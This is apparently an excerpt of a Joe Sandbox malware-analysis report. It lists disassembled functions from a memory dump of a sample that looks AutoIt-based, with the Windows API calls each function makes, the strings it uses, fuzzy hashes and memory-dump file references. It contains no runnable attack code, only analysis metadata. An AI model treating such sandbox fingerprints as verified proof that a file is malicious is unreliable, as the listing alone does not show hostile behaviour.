Instruction Fuzzy Hash: 38F03076142168BBE7215B52AC4EEEF3A7CEFCAB11F100168F601D1091E7B05A01D7B5

Function 00247439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 00247452
SendMessageW.USER32(?,00001328,00000000,?), ref: 00247469
GetWindowDC.USER32(?), ref: 00247475
GetPixel.GDI32(00000000,?,?), ref: 00247484
ReleaseDC.USER32(?,00000000), ref: 00247496
GetSysColor.USER32(00000005), ref: 002474B0

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 97c06376f299879ccdae9e8fa195f7ae5ac5682791549cf5b17552f801f5ddde
Instruction ID: f75119a65729e27573b92970534ade24ee24ee28b3decae7aaba9f0203f5a756
Opcode Fuzzy Hash: 97c06376f299879ccdae9e8fa195f7ae5ac5682791549cf5b17552f801f5ddde
Instruction Fuzzy Hash: BB01AD35411215EFDB105FA4EC0CBBA7BB5FF04321F604060F926A21A1CB311E61EB20

Function 00251874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0025187F
UnloadUserProfile.USERENV(?,?), ref: 0025188B
CloseHandle.KERNEL32(?), ref: 00251894
CloseHandle.KERNEL32(?), ref: 0025189C
GetProcessHeap.KERNEL32(00000000,?), ref: 002518A5
HeapFree.KERNEL32(00000000), ref: 002518AC

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: f90167770cc992f748bb50e4c6e8086efc1ce0e9154172698e00d394c7a7a21f
Instruction ID: 43e8ea942ef9fd0e079b648f93bf562b516992dce462896d04cd3d968bc23ea3
Opcode Fuzzy Hash: f90167770cc992f748bb50e4c6e8086efc1ce0e9154172698e00d394c7a7a21f
Instruction Fuzzy Hash: 13E0E53A005101BBDB016FA1FD0CD0ABF39FF49B22B208220F22981476CB329421EF60

Function 001FBBE0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001FBEB3

Strings

D%,D%,, xrefs: 001FBCA5
D%,, xrefs: 001FBE9A
D%,, xrefs: 001FBCA2
D%,, xrefs: 001FBDED, 001FBD91, 001FBD1B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Init_thread_footer
String ID: D%,$D%,$D%,$D%,D%,
API String ID: 1385522511-1929757701
Opcode ID: 2105be966ac7140b7c64c2f952689689abfb7240cd4392eb1e5c160c17deab5f
Instruction ID: 75f6e74b8cda90d205958189710fd2f62177e371d846ead86d4f255b469943da
Opcode Fuzzy Hash: 2105be966ac7140b7c64c2f952689689abfb7240cd4392eb1e5c160c17deab5f
Instruction Fuzzy Hash: 46913B75A0420ACFCB18CF98C0D0ABAB7F1FF58314F65816ADA55AB351DB71E981CB90

Function 00277B7E Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00210242: EnterCriticalSection.KERNEL32(002C070C,002C1884,?,?,0020198B,002C2518,?,?,?,001F12F9,00000000), ref: 0021024D
Part of subcall function 00210242: LeaveCriticalSection.KERNEL32(002C070C,?,0020198B,002C2518,?,?,?,001F12F9,00000000), ref: 0021028A

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

Part of subcall function 002100A3: __onexit.LIBCMT ref: 002100A9

__Init_thread_footer.LIBCMT ref: 00277BFB

Part of subcall function 002101F8: EnterCriticalSection.KERNEL32(002C070C,?,?,00208747,002C2514), ref: 00210202
Part of subcall function 002101F8: LeaveCriticalSection.KERNEL32(002C070C,?,00208747,002C2514), ref: 00210235

Strings

+T$, xrefs: 00277E2E
Variable must be of type 'Object'., xrefs: 00277C3A
5, xrefs: 00277C78
G, xrefs: 00277C7F

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: +T$$5$G$Variable must be of type 'Object'.
API String ID: 535116098-757584443
Opcode ID: 6fe4f744003893c001cb90a73b7e21d589f2f7e8f2f9856a11665b55d7b8adbb
Instruction ID: d02fce6cca4fae9582fca80196ee34e445748102cb89322ed4ef3b020475ee84
Opcode Fuzzy Hash: 6fe4f744003893c001cb90a73b7e21d589f2f7e8f2f9856a11665b55d7b8adbb
Instruction Fuzzy Hash: 2A918A74A24209EFCB14EF54D891DBDB7B1FF49300F508059F80A9B292DB71AE65CB50

Function 0025C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 001F7620: _wcslen.LIBCMT ref: 001F7625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0025C6EE
_wcslen.LIBCMT ref: 0025C735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0025C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0025C7CA

Strings

0, xrefs: 0025C6AF

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 9250bb6fab3e45dcc7d350ec816e8c706d2048aa75381b3310a97af50dd3ff1f
Instruction ID: fdce7ee3b6ed4fc6474f9c0b021393baab0de5671cdc8773060d1ed12f3811ad
Opcode Fuzzy Hash: 9250bb6fab3e45dcc7d350ec816e8c706d2048aa75381b3310a97af50dd3ff1f
Instruction Fuzzy Hash: AA51E1716243029FD7109E28C885B6AB7E8AF89311F240A2DFD95D35D1E770DD28CF9A

Function 0027AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0027AEA3

Part of subcall function 001F7620: _wcslen.LIBCMT ref: 001F7625

GetProcessId.KERNEL32(00000000), ref: 0027AF38
CloseHandle.KERNEL32(00000000), ref: 0027AF67

Strings

<, xrefs: 0027AE6B
@, xrefs: 0027AE72

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: dd66361a56847389c96aa5e7fee629e787ab3d91e636613ecb14b4bd8203acee
Instruction ID: 4e68c6bbef77804d083932f3b8c5c2b274c73e67446fab95d233779e629c7646
Opcode Fuzzy Hash: dd66361a56847389c96aa5e7fee629e787ab3d91e636613ecb14b4bd8203acee
Instruction Fuzzy Hash: 09718B70A10219DFCB14DF54D484AAEBBF0FF48320F0484A9E81AAB3A2C775ED55CB91

Function 0025719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00257206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0025723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0025724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002572CF

Strings

DllGetClassObject, xrefs: 00257242

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 3da9605d8b1cab59f60a8d85e7f51cf23a6f3fb6e9259056bb6a0092cefefffd
Instruction ID: 8598622837fa0fc5cd440fadc297fef77be75eba0e8bd79d9fb92c78c7ac84d1
Opcode Fuzzy Hash: 3da9605d8b1cab59f60a8d85e7f51cf23a6f3fb6e9259056bb6a0092cefefffd
Instruction Fuzzy Hash: 0D41C171A54204EFDB15CF54D888A9A7BB9EF44311F2080AEBD09DF20AD7B0DD59CBA4

Function 00282F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00282F8D
LoadLibraryW.KERNEL32(?), ref: 00282F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00282FA9
DestroyWindow.USER32(?), ref: 00282FB1

Strings

SysAnimate32, xrefs: 00282F68

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: 0b8b0e635ac46096a37e0e10b369257946b08ed4b8cda821a995114785fe84ed
Instruction ID: 4af52dda079036f096b4c4dcd85970a20851a13835c822f3f613233b242e173e
Opcode Fuzzy Hash: 0b8b0e635ac46096a37e0e10b369257946b08ed4b8cda821a995114785fe84ed
Instruction Fuzzy Hash: C221BB79221206EBEB106F649C84EBB37B9EF69364F104228FA10924D0D771DC65D760

Function 00214D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00214D1E,002228E9,?,00214CBE,002228E9,002B88B8,0000000C,00214E15,002228E9,00000002), ref: 00214D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00214DA0
FreeLibrary.KERNEL32(00000000,?,?,?,00214D1E,002228E9,?,00214CBE,002228E9,002B88B8,0000000C,00214E15,002228E9,00000002,00000000), ref: 00214DC3

Strings

CorExitProcess, xrefs: 00214D98
mscoree.dll, xrefs: 00214D86

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 2493f1bd3cd4df1c83b06a930c34a604d9906c687e8bb3c0108369d87719df71
Instruction ID: 6bc4addc440eea2d86e0ad2f32e2b3a356c0b265271e0d8a93c3ea99e98b62e5
Opcode Fuzzy Hash: 2493f1bd3cd4df1c83b06a930c34a604d9906c687e8bb3c0108369d87719df71
Instruction Fuzzy Hash: B5F0A43455120CBBDF155F90EC4DBDDBBF4EF04712F1000A4F909A2250CB305990CBA0

Function 0024D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 0024D3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0024D3BF
FreeLibrary.KERNEL32(00000000), ref: 0024D3E5

Strings

X64, xrefs: 0024D2A8
GetSystemWow64DirectoryW, xrefs: 0024D3B9

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: c0cea495c2813e4bdb365634c36aa06ab8fb046adbaabc47919b895af8ad459b
Instruction ID: 378aca272c183767330de13f9abc13dde0071233bc94861e740229700f760bd4
Opcode Fuzzy Hash: c0cea495c2813e4bdb365634c36aa06ab8fb046adbaabc47919b895af8ad459b
Instruction Fuzzy Hash: 76F05C359377129BD73D6F204C8C9593B145F11B01B6481D5F805E2147D7F0CD748BA1

Function 001F4E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,001F4EDD,?,002C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001F4E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001F4EAE
FreeLibrary.KERNEL32(00000000,?,?,001F4EDD,?,002C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001F4EC0

Strings

kernel32.dll, xrefs: 001F4E94
Wow64DisableWow64FsRedirection, xrefs: 001F4EA8

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 0f014d321d4d8c7a3bc8628e5d18ebf050f56d4e7468968b8a6a2b5949a85d40
Instruction ID: e64d0bdb57ae3b0eb65438984ee3a38b323903996b900ab327e1d242c973c76f
Opcode Fuzzy Hash: 0f014d321d4d8c7a3bc8628e5d18ebf050f56d4e7468968b8a6a2b5949a85d40
Instruction Fuzzy Hash: 72E0CD39A039225BD3321B257C5CB7F7554AF82F637150115FE04D2241DB74CD0583B4

Function 001F4E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00233CDE,?,002C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001F4E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001F4E74
FreeLibrary.KERNEL32(00000000,?,?,00233CDE,?,002C1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001F4E87

Strings

kernel32.dll, xrefs: 001F4E5B
Wow64RevertWow64FsRedirection, xrefs: 001F4E6E

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 3441ec89c83aab7eebbe9762f2a20591b03b718f4e871a0ceaf79cad2f346219
Instruction ID: 875814267d7b267e61900001e8f078c3cc8aa7ad6daf885b2936bc3a60f469a4
Opcode Fuzzy Hash: 3441ec89c83aab7eebbe9762f2a20591b03b718f4e871a0ceaf79cad2f346219
Instruction Fuzzy Hash: 0DD02B39503A315767325B247C0CEDF6A18AF86F523550210FA08E2111CF38CD15C3F0

Function 0027A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0027A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0027A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0027A468
CloseHandle.KERNEL32(?), ref: 0027A63D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 494f1a1b124873a6d88e6fa446fcd6cc779eb78f565588e2ecd3fa942a145d98
Instruction ID: ef0cb30c6897190dee79dea026ca888891c7d910de2af20cfe3fca3fc5654403
Opcode Fuzzy Hash: 494f1a1b124873a6d88e6fa446fcd6cc779eb78f565588e2ecd3fa942a145d98
Instruction Fuzzy Hash: 67A1C2716143019FE720DF28D886F2AB7E5AF84724F14885CF55A9B3D2D7B0EC518B92

Function 0022BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00293700), ref: 0022BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,002C121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0022BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,002C1270,000000FF,?,0000003F,00000000,?), ref: 0022BC36
_free.LIBCMT ref: 0022BB7F

Part of subcall function 002229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000), ref: 002229DE
Part of subcall function 002229C8: GetLastError.KERNEL32(00000000,?,0022D7D1,00000000,00000000,00000000,00000000,?,0022D7F8,00000000,00000007,00000000,?,0022DBF5,00000000,00000000), ref: 002229F0

_free.LIBCMT ref: 0022BD4B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: efcec0c7a6c267128fe5004292eaca4aad298b1f5fe49f955727124a4ee7935a
Instruction ID: 2ce9de9f3df9f7b06bffd6b5c8de26b5f7598ec7e9ff9e57ecbd0b0983b354c1
Opcode Fuzzy Hash: efcec0c7a6c267128fe5004292eaca4aad298b1f5fe49f955727124a4ee7935a
Instruction Fuzzy Hash: 65510975910229FFCB11EFE5BC859AEB7BCEF45310B20426AE914D7191EB709D708B50

Function 0025E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0025DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0025CF22,?), ref: 0025DDFD

Part of subcall function 0025DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0025CF22,?), ref: 0025DE16

Part of subcall function 0025E199: GetFileAttributesW.KERNEL32(?,0025CF95), ref: 0025E19A

lstrcmpiW.KERNEL32(?,?), ref: 0025E473
MoveFileW.KERNEL32(?,?), ref: 0025E4AC
_wcslen.LIBCMT ref: 0025E5EB
_wcslen.LIBCMT ref: 0025E603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0025E650

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 82ca67684313d486f6670e8eeed7fbf691d90af55332aab1347b811903028c2b
Instruction ID: d05df52c8ead9bc1ed3d7646db1ed88bd3bd4bd33ea7434e83d3dae19a2a31a8
Opcode Fuzzy Hash: 82ca67684313d486f6670e8eeed7fbf691d90af55332aab1347b811903028c2b
Instruction Fuzzy Hash: 285185B24183455BCB24EF90D8819DB73DC9F94341F00491EFA89D3151EF74A69C8B6A

Function 0027B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 001F9CB3: _wcslen.LIBCMT ref: 001F9CBD

Part of subcall function 0027C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0027B6AE,?,?), ref: 0027C9B5
Part of subcall function 0027C998: _wcslen.LIBCMT ref: 0027C9F1
Part of subcall function 0027C998: _wcslen.LIBCMT ref: 0027CA68
Part of subcall function 0027C998: _wcslen.LIBCMT ref: 0027CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0027BAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0027BB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0027BB63
RegCloseKey.ADVAPI32(?,?), ref: 0027BBA6
RegCloseKey.ADVAPI32(00000000), ref: 0027BBB3

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
